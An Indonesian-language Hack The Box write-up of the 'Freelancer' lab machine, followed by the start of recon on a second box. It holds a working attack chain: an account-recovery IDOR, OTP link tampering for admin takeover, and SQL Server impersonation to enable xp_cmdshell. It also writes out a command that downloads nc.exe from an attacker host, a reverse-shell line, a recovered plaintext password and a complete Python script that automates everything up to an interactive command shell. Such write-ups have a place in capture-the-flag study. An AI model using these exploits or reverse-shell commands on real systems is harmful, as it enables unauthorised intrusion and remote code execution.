Freelancer | N2L

Recon awal selalu pakai port scanning dan jika port http open kita dapat melakukan dirsearch.

naabu --host 10.129.57.150 -v -p - -nmap-cli 'nmap -sV' -o 10.129.57.150.port

 __
 ___ ___ ___ _/ / __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

 projectdiscovery.io

[INF] Current naabu version 2.3.1 (latest)
[INF] Running CONNECT scan with non root privileges
10.129.57.150:49671
10.129.57.150:49667
10.129.57.150:3268
10.129.57.150:53
10.129.57.150:52941
10.129.57.150:9389
10.129.57.150:5985
10.129.57.150:636
10.129.57.150:3269
10.129.57.150:593
10.129.57.150:49670
10.129.57.150:135
10.129.57.150:49672
10.129.57.150:139
10.129.57.150:445
10.129.57.150:80
10.129.57.150:88
10.129.57.150:52945
10.129.57.150:389
10.129.57.150:55820
10.129.57.150:55824
[INF] Found 21 ports on host 10.129.57.150 (10.129.57.150)
[INF] Running nmap command: nmap -sV -p 55820,636,49670,139,49671,3268,135,52945,55824,9389,593,5985,3269,389,445,88,52941,49667,49672,53,80 10.129.57.150
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-02 20:44 WIB
Nmap scan report for freelancer.htb (10.129.57.150)
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-02 18:44:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
52941/tcp filtered unknown
52945/tcp filtered unknown
55820/tcp open msrpc Microsoft Windows RPC
55824/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds

hasil dirsearch kepada port 80.

dirsearch -u http://freelancer.htb
/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
 from pkg_resources import DistributionNotFound, VersionConflict

 _|. _ _ _ _ _ _|_ v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723

Output: /home/replican/Desktop/Prod/HackTheBox/machine/Freelancer/reports/http_freelancer.htb/__24-06-02_21-13-58.txt

Target: http://freelancer.htb/

[21:13:58] Starting:
[21:14:44] 400 - 157B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:14:48] 301 - 0B - /about -> /about/
[21:14:51] 301 - 0B - /accounts/login -> /accounts/login/
[21:14:55] 301 - 0B - /admin -> /admin/
[21:14:58] 302 - 0B - /admin/ -> /admin/login/?next=/admin/
[21:14:58] 302 - 0B - /admin/%3bindex/ -> /admin/login/?next=/admin/%253Bindex/
[21:14:58] 302 - 0B - /admin/.config -> /admin/login/?next=/admin/.config
[21:14:58] 302 - 0B - /admin/.htaccess -> /admin/login/?next=/admin/.htaccess
[21:14:58] 302 - 0B - /admin/_logs/access-log -> /admin/login/?next=/admin/_logs/access-log
[21:14:58] 302 - 0B - /admin/_logs/access.log -> /admin/login/?next=/admin/_logs/access.log
[21:14:58] 302 - 0B - /admin/_logs/access_log -> /admin/login/?next=/admin/_logs/access_log
[21:14:58] 302 - 0B - /admin/_logs/err.log -> /admin/login/?next=/admin/_logs/err.log
[21:14:58] 302 - 0B - /admin/_logs/error.log -> /admin/login/?next=/admin/_logs/error.log
[21:14:58] 302 - 0B - /admin/_logs/error-log -> /admin/login/?next=/admin/_logs/error-log
[21:14:58] 302 - 0B - /admin/_logs/error_log -> /admin/login/?next=/admin/_logs/error_log
[21:14:58] 302 - 0B - /admin/access.log -> /admin/login/?next=/admin/access.log
[21:14:58] 302 - 0B - /admin/access_log -> /admin/login/?next=/admin/access_log
[21:14:58] 302 - 0B - /admin/access.txt -> /admin/login/?next=/admin/access.txt
[21:14:58] 302 - 0B - /admin/account -> /admin/login/?next=/admin/account
[21:14:58] 302 - 0B - /admin/account.aspx -> /admin/login/?next=/admin/account.aspx
[21:14:58] 302 - 0B - /admin/account.php -> /admin/login/?next=/admin/account.php
[21:14:58] 302 - 0B - /admin/account.jsp -> /admin/login/?next=/admin/account.jsp
[21:14:58] 302 - 0B - /admin/account.js -> /admin/login/?next=/admin/account.js
[21:14:58] 302 - 0B - /admin/_logs/login.txt -> /admin/login/?next=/admin/_logs/login.txt
[21:14:58] 302 - 0B - /admin/admin-login -> /admin/login/?next=/admin/admin-login
[21:14:58] 302 - 0B - /admin/admin-login.php -> /admin/login/?next=/admin/admin-login.php
[21:14:58] 302 - 0B - /admin/admin-login.aspx -> /admin/login/?next=/admin/admin-login.aspx
[21:14:58] 302 - 0B - /admin/account.html -> /admin/login/?next=/admin/account.html
[21:14:59] 302 - 0B - /admin/admin-login.jsp -> /admin/login/?next=/admin/admin-login.jsp
[21:14:58] 302 - 0B - /admin/admin -> /admin/login/?next=/admin/admin
[21:14:59] 302 - 0B - /admin/admin-login.html -> /admin/login/?next=/admin/admin-login.html
[21:14:59] 302 - 0B - /admin/admin-login.js -> /admin/login/?next=/admin/admin-login.js
[21:14:59] 302 - 0B - /admin/admin.php -> /admin/login/?next=/admin/admin.php
[21:14:59] 302 - 0B - /admin/admin.jsp -> /admin/login/?next=/admin/admin.jsp
[21:14:59] 302 - 0B - /admin/admin.html -> /admin/login/?next=/admin/admin.html
[21:14:59] 302 - 0B - /admin/admin.js -> /admin/login/?next=/admin/admin.js
[21:14:59] 302 - 0B - /admin/admin.aspx -> /admin/login/?next=/admin/admin.aspx
[21:14:59] 302 - 0B - /admin/admin/login -> /admin/login/?next=/admin/admin/login
[21:14:59] 302 - 0B - /admin/admin_login -> /admin/login/?next=/admin/admin_login
[21:14:59] 302 - 0B - /admin/admin_login.aspx -> /admin/login/?next=/admin/admin_login.aspx
[21:14:59] 302 - 0B - /admin/admin_login.php -> /admin/login/?next=/admin/admin_login.php
[21:14:59] 302 - 0B - /admin/admin_login.html -> /admin/login/?next=/admin/admin_login.html
[21:14:59] 302 - 0B - /admin/adminLogin -> /admin/login/?next=/admin/adminLogin
[21:14:59] 302 - 0B - /admin/admin_login.js -> /admin/login/?next=/admin/admin_login.js
[21:14:59] 302 - 0B - /admin/admin_login.jsp -> /admin/login/?next=/admin/admin_login.jsp
[21:14:59] 302 - 0B - /admin/adminLogin.php -> /admin/login/?next=/admin/adminLogin.php
[21:15:00] 302 - 0B - /admin/adminLogin.aspx -> /admin/login/?next=/admin/adminLogin.aspx
[21:14:59] 302 - 0B - /admin/adminer.php -> /admin/login/?next=/admin/adminer.php
[21:15:00] 302 - 0B - /admin/backup/ -> /admin/login/?next=/admin/backup/
[21:15:00] 302 - 0B - /admin/adminLogin.js -> /admin/login/?next=/admin/adminLogin.js
[21:15:00] 302 - 0B - /admin/adminLogin.html -> /admin/login/?next=/admin/adminLogin.html
[21:15:00] 302 - 0B - /admin/backups/ -> /admin/login/?next=/admin/backups/
[21:15:00] 302 - 0B - /admin/controlpanel -> /admin/login/?next=/admin/controlpanel
[21:14:59] 302 - 0B - /admin/adminLogin.jsp -> /admin/login/?next=/admin/adminLogin.jsp
[21:15:00] 302 - 0B - /admin/config.php -> /admin/login/?next=/admin/config.php
[21:15:00] 302 - 0B - /admin/controlpanel.php -> /admin/login/?next=/admin/controlpanel.php
[21:15:00] 302 - 0B - /admin/controlpanel.aspx -> /admin/login/?next=/admin/controlpanel.aspx
[21:15:00] 302 - 0B - /admin/controlpanel.jsp -> /admin/login/?next=/admin/controlpanel.jsp
[21:15:00] 302 - 0B - /admin/cp.php -> /admin/login/?next=/admin/cp.php
[21:15:00] 302 - 0B - /admin/controlpanel.js -> /admin/login/?next=/admin/controlpanel.js
[21:15:00] 302 - 0B - /admin/cp -> /admin/login/?next=/admin/cp
[21:15:00] 302 - 0B - /admin/cp.aspx -> /admin/login/?next=/admin/cp.aspx
[21:15:00] 302 - 0B - /admin/cp.jsp -> /admin/login/?next=/admin/cp.jsp
[21:15:00] 302 - 0B - /admin/controlpanel.html -> /admin/login/?next=/admin/controlpanel.html
[21:15:00] 302 - 0B - /admin/cp.html -> /admin/login/?next=/admin/cp.html
[21:15:00] 302 - 0B - /admin/cp.js -> /admin/login/?next=/admin/cp.js
[21:15:00] 302 - 0B - /admin/data/autosuggest -> /admin/login/?next=/admin/data/autosuggest
[21:15:00] 302 - 0B - /admin/db/ -> /admin/login/?next=/admin/db/
[21:15:00] 302 - 0B - /admin/default -> /admin/login/?next=/admin/default
[21:15:00] 302 - 0B - /admin/default.asp -> /admin/login/?next=/admin/default.asp
[21:15:01] 302 - 0B - /admin/default/admin.asp -> /admin/login/?next=/admin/default/admin.asp
[21:15:01] 302 - 0B - /admin/default/login.asp -> /admin/login/?next=/admin/default/login.asp
[21:15:01] 302 - 0B - /admin/download.php -> /admin/login/?next=/admin/download.php
[21:15:01] 302 - 0B - /admin/dumper/ -> /admin/login/?next=/admin/dumper/
[21:15:01] 302 - 0B - /admin/error.log -> /admin/login/?next=/admin/error.log
[21:15:01] 302 - 0B - /admin/error.txt -> /admin/login/?next=/admin/error.txt
[21:15:01] 302 - 0B - /admin/error_log -> /admin/login/?next=/admin/error_log
[21:15:01] 302 - 0B - /admin/FCKeditor -> /admin/login/?next=/admin/FCKeditor
[21:15:01] 302 - 0B - /admin/errors.log -> /admin/login/?next=/admin/errors.log
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[21:15:01] 302 - 0B - /admin/export.php -> /admin/login/?next=/admin/export.php
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/php/connector.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/connector.php
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/php/upload.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/upload.php
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/upload/php/upload.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/php/upload.php
[21:15:02] 302 - 0B - /admin/file.php -> /admin/login/?next=/admin/file.php
[21:15:02] 302 - 0B - /admin/files.php -> /admin/login/?next=/admin/files.php
[21:15:02] 302 - 0B - /admin/heapdump -> /admin/login/?next=/admin/heapdump
[21:15:02] 302 - 0B - /admin/home -> /admin/login/?next=/admin/home
[21:15:02] 302 - 0B - /admin/home.php -> /admin/login/?next=/admin/home.php
[21:15:02] 302 - 0B - /admin/home.jsp -> /admin/login/?next=/admin/home.jsp
[21:15:02] 302 - 0B - /admin/home.aspx -> /admin/login/?next=/admin/home.aspx
[21:15:02] 302 - 0B - /admin/home.js -> /admin/login/?next=/admin/home.js
[21:15:02] 302 - 0B - /admin/index -> /admin/login/?next=/admin/index
[21:15:02] 302 - 0B - /admin/home.html -> /admin/login/?next=/admin/home.html
[21:15:02] 302 - 0B - /admin/index.aspx -> /admin/login/?next=/admin/index.aspx
[21:15:02] 302 - 0B - /admin/index.jsp -> /admin/login/?next=/admin/index.jsp
[21:15:02] 302 - 0B - /admin/index.php -> /admin/login/?next=/admin/index.php
[21:15:02] 302 - 0B - /admin/includes/configure.php~ -> /admin/login/?next=/admin/includes/configure.php~
[21:15:02] 302 - 0B - /admin/index.html -> /admin/login/?next=/admin/index.html
[21:15:02] 302 - 0B - /admin/js/tiny_mce -> /admin/login/?next=/admin/js/tiny_mce
[21:15:02] 302 - 0B - /admin/index.js -> /admin/login/?next=/admin/index.js
[21:15:02] 302 - 0B - /admin/js/tiny_mce/ -> /admin/login/?next=/admin/js/tiny_mce/
[21:15:02] 302 - 0B - /admin/js/tinymce -> /admin/login/?next=/admin/js/tinymce
[21:15:03] 302 - 0B - /admin/js/tinymce/ -> /admin/login/?next=/admin/js/tinymce/
[21:15:03] 302 - 0B - /admin/log -> /admin/login/?next=/admin/log
[21:15:03] 302 - 0B - /admin/login -> /admin/login/?next=/admin/login
[21:15:03] 302 - 0B - /admin/log/error.log -> /admin/login/?next=/admin/log/error.log
[21:15:03] 302 - 0B - /admin/login.aspx -> /admin/login/?next=/admin/login.aspx
[21:15:03] 302 - 0B - /admin/login.php -> /admin/login/?next=/admin/login.php
[21:15:03] 302 - 0B - /admin/login.jsp -> /admin/login/?next=/admin/login.jsp
[21:15:03] 302 - 0B - /admin/login.html -> /admin/login/?next=/admin/login.html
[21:15:03] 302 - 0B - /admin/login.js -> /admin/login/?next=/admin/login.js
[21:15:03] 302 - 0B - /admin/login.asp -> /admin/login/?next=/admin/login.asp
[21:15:04] 302 - 0B - /admin/login.do -> /admin/login/?next=/admin/login.do
[21:15:04] 302 - 0B - /admin/login.py -> /admin/login/?next=/admin/login.py
[21:15:04] 302 - 0B - /admin/login.htm -> /admin/login/?next=/admin/login.htm
[21:15:04] 302 - 0B - /admin/login.rb -> /admin/login/?next=/admin/login.rb
[21:15:04] 302 - 0B - /admin/logon -> /admin/login/?next=/admin/logon
[21:15:04] 302 - 0B - /admin/logon.jsp -> /admin/login/?next=/admin/logon.jsp
[21:15:04] 302 - 0B - /admin/logon.aspx -> /admin/login/?next=/admin/logon.aspx
[21:15:04] 302 - 0B - /admin/logon.html -> /admin/login/?next=/admin/logon.html
[21:15:04] 302 - 0B - /admin/logs/access-log -> /admin/login/?next=/admin/logs/access-log
[21:15:04] 302 - 0B - /admin/logs/err.log -> /admin/login/?next=/admin/logs/err.log
[21:15:04] 302 - 0B - /admin/logs/access.log -> /admin/login/?next=/admin/logs/access.log
[21:15:04] 302 - 0B - /admin/logs/access_log -> /admin/login/?next=/admin/logs/access_log
[21:15:04] 302 - 0B - /admin/logon.php -> /admin/login/?next=/admin/logon.php
[21:15:04] 302 - 0B - /admin/logs/error-log -> /admin/login/?next=/admin/logs/error-log
[21:15:04] 302 - 0B - /admin/logon.js -> /admin/login/?next=/admin/logon.js
[21:15:04] 302 - 0B - /admin/logs/ -> /admin/login/?next=/admin/logs/
[21:15:04] 302 - 0B - /admin/logs/error.log -> /admin/login/?next=/admin/logs/error.log
[21:15:04] 302 - 0B - /admin/logs/error_log -> /admin/login/?next=/admin/logs/error_log
[21:15:04] 302 - 0B - /admin/logs/errors.log -> /admin/login/?next=/admin/logs/errors.log
[21:15:04] 302 - 0B - /admin/logs/login.txt -> /admin/login/?next=/admin/logs/login.txt
[21:15:04] 302 - 0B - /admin/manage.asp -> /admin/login/?next=/admin/manage.asp
[21:15:04] 302 - 0B - /admin/manage/admin.asp -> /admin/login/?next=/admin/manage/admin.asp
[21:15:04] 302 - 0B - /admin/manage -> /admin/login/?next=/admin/manage
[21:15:05] 302 - 0B - /admin/manage/login.asp -> /admin/login/?next=/admin/manage/login.asp
[21:15:05] 302 - 0B - /admin/mysql/index.php -> /admin/login/?next=/admin/mysql/index.php
[21:15:05] 302 - 0B - /admin/mysql/ -> /admin/login/?next=/admin/mysql/
[21:15:05] 302 - 0B - /admin/mysql2/index.php -> /admin/login/?next=/admin/mysql2/index.php
[21:15:05] 302 - 0B - /admin/phpMyAdmin -> /admin/login/?next=/admin/phpMyAdmin
[21:15:05] 302 - 0B - /admin/phpMyAdmin/ -> /admin/login/?next=/admin/phpMyAdmin/
[21:15:05] 302 - 0B - /admin/phpmyadmin/ -> /admin/login/?next=/admin/phpmyadmin/
[21:15:05] 302 - 0B - /admin/pMA/ -> /admin/login/?next=/admin/pMA/
[21:15:05] 302 - 0B - /admin/phpMyAdmin/index.php -> /admin/login/?next=/admin/phpMyAdmin/index.php
[21:15:05] 302 - 0B - /admin/pma/ -> /admin/login/?next=/admin/pma/
[21:15:05] 302 - 0B - /admin/phpmyadmin2/index.php -> /admin/login/?next=/admin/phpmyadmin2/index.php
[21:15:05] 302 - 0B - /admin/pma/index.php -> /admin/login/?next=/admin/pma/index.php
[21:15:05] 302 - 0B - /admin/PMA/index.php -> /admin/login/?next=/admin/PMA/index.php
[21:15:05] 302 - 0B - /admin/pol_log.txt -> /admin/login/?next=/admin/pol_log.txt
[21:15:05] 302 - 0B - /admin/phpmyadmin/index.php -> /admin/login/?next=/admin/phpmyadmin/index.php
[21:15:06] 302 - 0B - /admin/release -> /admin/login/?next=/admin/release
[21:15:06] 302 - 0B - /admin/private/logs -> /admin/login/?next=/admin/private/logs
[21:15:06] 302 - 0B - /admin/scripts/fckeditor -> /admin/login/?next=/admin/scripts/fckeditor
[21:15:06] 302 - 0B - /admin/secure/logon.jsp -> /admin/login/?next=/admin/secure/logon.jsp
[21:15:06] 302 - 0B - /admin/sqladmin/ -> /admin/login/?next=/admin/sqladmin/
[21:15:06] 302 - 0B - /admin/portalcollect.php?f=http://xxx&t=js -> /admin/login/?next=/admin/portalcollect.php%3Ff%3Dhttp%3A//xxx%26t%3Djs
[21:15:06] 302 - 0B - /admin/sxd/ -> /admin/login/?next=/admin/sxd/
[21:15:06] 302 - 0B - /admin/sysadmin/ -> /admin/login/?next=/admin/sysadmin/
[21:15:06] 302 - 0B - /admin/tinymce -> /admin/login/?next=/admin/tinymce
[21:15:06] 302 - 0B - /admin/upload.php -> /admin/login/?next=/admin/upload.php
[21:15:06] 302 - 0B - /admin/uploads.php -> /admin/login/?next=/admin/uploads.php
[21:15:06] 302 - 0B - /admin/signin -> /admin/login/?next=/admin/signin
[21:15:06] 302 - 0B - /admin/user_count.txt -> /admin/login/?next=/admin/user_count.txt
[21:15:06] 302 - 0B - /admin/views/ajax/autocomplete/user/a -> /admin/login/?next=/admin/views/ajax/autocomplete/user/a
[21:15:06] 302 - 0B - /admin/web/ -> /admin/login/?next=/admin/web/
[21:15:06] 302 - 0B - /admin/tiny_mce -> /admin/login/?next=/admin/tiny_mce
[21:15:53] 301 - 0B - /blog -> /blog/
[21:15:54] 200 - 19KB - /blog/
[21:16:07] 301 - 0B - /contact -> /contact/
[21:16:46] 400 - 157B - /index.php::$DATA
[21:18:00] 404 - 555B - /static/api/swagger.json
[21:18:00] 404 - 555B - /static/api/swagger.yaml
[21:18:00] 404 - 555B - /static/dump.sql
[21:18:12] 400 - 157B - /Trace.axd::$DATA
[21:18:24] 400 - 157B - /web.config::$DATA

Task Completed

terdapat port 80 lgsg kita pentest saja, terdapa bug validation idor. ketika kita register menjadi employer tidak akan bisa karna butuh divalidasi. lgsg saja kita akses

akses nya pake akun freelancer ( register jika belum )

dan input username employer yang kalian mau aktifkan

dan ketika sudah dijawab seperti yg kalian daftarkan sebelumnya maka akun emplyernya akan teraktivasi

terdapat fitur QR Code dan ketika kita scan qr nya

terdapat sebuah base64 MTAwMTE yang berarti 10011, seperti user id. disini saya mencoba menggantinya menjadi 2 yang di base64

contoh : http://freelancer.htb/accounts/login/otp/MTAwMTE=/f41c9032a6f7c2c50ec62b7ef8b31d16/

jadi : http://freelancer.htb/accounts/login/otp/Mgo=/f41c9032a6f7c2c50ec62b7ef8b31d16/

dan yep kita jadi admin sekarang.seperti scanning dirsearch diatas ada path /admin kita lgsg kesana

pas aku coba show tables ternyata db ini adalah disini tujian kita yaitu spawn xp_cmdshell karna ini windows juga.

karna disini kita bukan sysadmin dan xp_cmdshell di disable dengan sp_configure. kita perlu melakukan privilage menggunakan command berikut

EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'

-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

dan sehabis itu kita baru dapat menggunakan xp_cmdshell

lgsg saja kita buat revshell. disini saya pakai nc binary

xp_cmdshell 'echo IWR http://10.10.14.88:1337/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'

 xp_cmdshell '%TEMP%\nc.exe 10.10.14.88 1338 -e powershell'

dan yep kita dapet in revshell

lgsg kita dump aja sql user pw nya buat dapetin mikasha user shell

IL0v3ErenY3ager ini pw nya tinggal RunAs aja yak ges

import httpx
from bs4 import BeautifulSoup
from pwn import *
from PIL import Image
from io import BytesIO
from pyzbar.pyzbar import decode
import re

URL = "http://freelancer.htb"
# change this to debug if you want to see the csrf logger
context.log_level = 'info'

class BaseAPI:
 def __init__(self, url=URL) -> None:
 self.c = httpx.Client(base_url=url, proxy={
 "http://" : "http://127.0.0.1:8080"
 })

class API(BaseAPI):
 def getCsrfToken(self,path):
 if hasattr(self, 'admin_cookies'):

 r = self.c.get(path, cookies={
 'sessionid' : self.admin_cookies
 }, follow_redirects=True)

 else:
 r = self.c.get(path)
 self.csrf_token = r.cookies["csrftoken"]
 soup = BeautifulSoup(r.text, "html.parser")
 csrf = soup.find("input", {"name": "csrfmiddlewaretoken"})
 if csrf:
 csrf_value = csrf["value"]
 self.csrf_middleware = csrf_value
 debug(f"csrf/{self.csrf_middleware} from path{path}")
 else:
 csrf_value = re.findall(r'csrfmiddlewaretoken: "(.*?)"', r.text)
 if len(csrf_value) >= 1:
 self.csrf_middleware = csrf_value[0]
 debug(f"csrf/{self.csrf_middleware} from path{path}")
 else:
 warn("csrf token/middleware is not found")

 def FreelancerLogin(self, user, password):
 path = "/accounts/login/"
 self.getCsrfToken(path)
 r = self.c.post(path, data={
 "csrfmiddlewaretoken": self.csrf_middleware,
 "username": user,
 "password" : password
 })
 self.freelancer_sessionid = r.cookies["sessionid"]
 info(f"success login freelancer account {user}:{password}")
 def EmployerLogin(self, user, password):
 path = "/accounts/login/"
 self.getCsrfToken(path)
 r = self.c.post(path, data={
 "csrfmiddlewaretoken": self.csrf_middleware,
 "username": user,
 "password" : password
 })
 self.employer_sessionid = r.cookies["sessionid"]
 info(f"success login employer account {user}:{password}")
 def createAccountFreelancer(self, user, passwd):
 path = "/freelancer/register/"
 self.getCsrfToken(path)
 r = self.c.post(path, data={
 "csrfmiddlewaretoken": self.csrf_middleware,
 "username": user,
 "email" : f"{user}@gmail.com",
 "first_name": user,
 "last_name": user,
 "address" : user,
 "security_q1": user,
 "security_q2": user,
 "security_q3": user,
 "job_title": user,
 "years_of_experience": 33,
 "description": user,
 "password1": passwd,
 "password2": passwd
 }, cookies={
 "csrftoken" : self.csrf_token
 }, headers={'Content-Type': 'application/x-www-form-urlencoded'} )

 api.FreelancerLogin(user,passwd)

 def createAccountEmployer(self, user, passwd):
 path = "/employer/register/"
 self.getCsrfToken(path)
 r = self.c.post(path, data={
 "csrfmiddlewaretoken": self.csrf_middleware,
 "username": user,
 "email" : f"{user}@gmail.com",
 "first_name": user,
 "last_name": user,
 "address" : user,
 "security_q1": user,
 "security_q2": user,
 "security_q3": user,
 "company_name": user,
 "password1": passwd,
 "password2": passwd
 }, cookies={
 "csrftoken" : self.csrf_token
 }, headers={'Content-Type': 'application/x-www-form-urlencoded'} , follow_redirects=False)
 info(f"success create emplyer account {user}:{passwd}")

 def ActivateAccountIDOR(self, userEmployer, password):
 path = "/accounts/recovery/"
 self.getCsrfToken(path)
 r = self.c.post(path, data={
 "csrfmiddlewaretoken": self.csrf_middleware,
 "username": userEmployer,
 "security_q1": userEmployer,
 "security_q2": userEmployer,
 "security_q3": userEmployer,
 }, cookies={
 "sessionid":self.freelancer_sessionid
 })
 api.EmployerLogin(userEmployer, password)
 return "success activate employer account through idor account recovery"
 def GetQrCode(self, idTakeover):
 path = "/accounts/otp/qrcode/generate/" 
 r = self.c.get(path, cookies={
 "sessionid" :self.employer_sessionid
 })
 image = Image.open(BytesIO(r.content))
 qr_codes = decode(image)
 for qr_code in qr_codes:
 match = re.search(r'otp/([^/]+)/', qr_code.data.decode('utf-8'))
 if match:
 otp_string = match.group(1)
 decoded_otp_string = base64.b64decode(otp_string).decode()
 encoded_idTakeover = base64.b64encode(idTakeover.encode()).decode()
 info(f'changing id for otp {otp_string}:{decoded_otp_string} to {encoded_idTakeover}:{idTakeover}')
 self.adminUrl = qr_code.data.decode('utf-8').replace(otp_string, encoded_idTakeover)
 success(f'here the full link {self.adminUrl}, for admin takeover. enjoy it.' )
 else:
 error("No match found")

 def LoginAdmin(self):
 r = self.c.get(f"{self.adminUrl}")
 self.admin_cookies = r.cookies["sessionid"]

 def QuerySqli(self, query):
 path = "/admin/executeRawSql/" 
 self.getCsrfToken("/admin")
 return self.c.post(path, data={
 'query': query,
 'csrfmiddlewaretoken' : self.csrf_middleware
 }, cookies={
 'sessionid': self.admin_cookies
 })

 def BypassXpCmdShell(self):
 api.LoginAdmin()
 info(f'admin cookies : {self.admin_cookies}')
 api.QuerySqli("""EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'""")
 api.QuerySqli("""

-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

""") 
 def RceSqli(self,cmd):

 rows = api.QuerySqli(f"xp_cmdshell '{cmd}'").json().get('result', {}).get('rows', [])
 for row in rows:
 if len(row) >= 1:
 success(row[0])

 ...

if __name__ == "__main__":
 api = API()
 api.createAccountFreelancer('replicannormal', '@Hack4you1337')
 api.createAccountEmployer('replicanlw', '@Hack4you1337')
 info(api.ActivateAccountIDOR('replicanlw', '@Hack4you1337'))
 api.GetQrCode(idTakeover='2')
 isRce = input(info('do u want to get the rce automatically through xp_cmdshell? (y/n)'))
 if "y" or "Y" in isRce:
 api.BypassXpCmdShell()
 while True:
 cmd = input('cmd > ')
 api.RceSqli(cmd)

Page 2

massscan & nmap & dirsearch like usual

/bin/cat masscan_10.129.36.167
<?xml version="1.0"?>
<!-- masscan v1.0 scan -->
<nmaprun scanner="masscan" start="1716243183" version="1.0-BETA" xmloutputversion="1.03">
<scaninfo type="syn" protocol="tcp" />
<host endtime="1716243183"><address addr="10.129.36.167" addrtype="ipv4"/><ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<host endtime="1716243303"><address addr="10.129.36.167" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<runstats>
<finished time="1716243330" timestr="2024-05-21 05:15:30" elapsed="205" />
<hosts up="2" down="0" total="2" />
</runstats>
</nmaprun>

/bin/cat nmap_detailed_all_tcp_ports.txt
# Nmap 7.95 scan initiated Tue May 21 05:15:56 2024 as: nmap -p "80, 22" -sVSC -A -oN nmap_detailed_all_tcp_ports.txt -v2 10.129.36.167
Nmap scan report for 10.129.36.167
Host is up, received echo-reply ttl 63 (0.044s latency).
Scanned at 2024-05-21 05:15:57 WIB for 9s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
| 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
